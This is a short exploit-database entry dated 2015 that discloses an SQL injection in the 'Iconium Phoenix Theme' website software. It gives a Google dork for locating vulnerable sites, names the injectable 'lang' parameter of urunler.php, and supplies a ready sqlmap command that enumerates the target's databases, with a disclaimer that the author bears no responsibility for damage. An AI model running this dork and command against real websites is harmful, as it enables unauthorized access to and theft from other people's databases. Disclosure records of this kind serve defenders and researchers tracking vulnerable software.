id: 23233
date: 02/03/2015
title: Iconium Phoenix Theme - SQL Injection Vulnerability
author: Herdem
cves: 

# Exploit Title: Iconium Phoenix Theme - SQL İnjection vulnerability
# Google Dork: intext:Powered by İconium Mühendislik
# Date: 03.02.2015
# Exploit Author: Herdem
# Vendor Homepage: http://iconiummuhendislik.com
# Software Link: http://iconiummuhendislik.com/phoneix2/
# Version: All Versions
# Tested on: Windows / Linux

*******************************************************
**** Author will be not responsible for any damage ****
*****************************************************

*** Explanation ***
*** Vulnerable : Sql Injection
*** Vulnerabilitie Area : www.site.com/urunler.php?lang=[ID]
*** Exploit code : sqlmap.py -u www.site.com/urunler.php?lang=[ID] --dbs

******************************************************

Greetz : All b3yaz.org members & Mugair

******************************************************

#  0day.today [2023-03-26]  #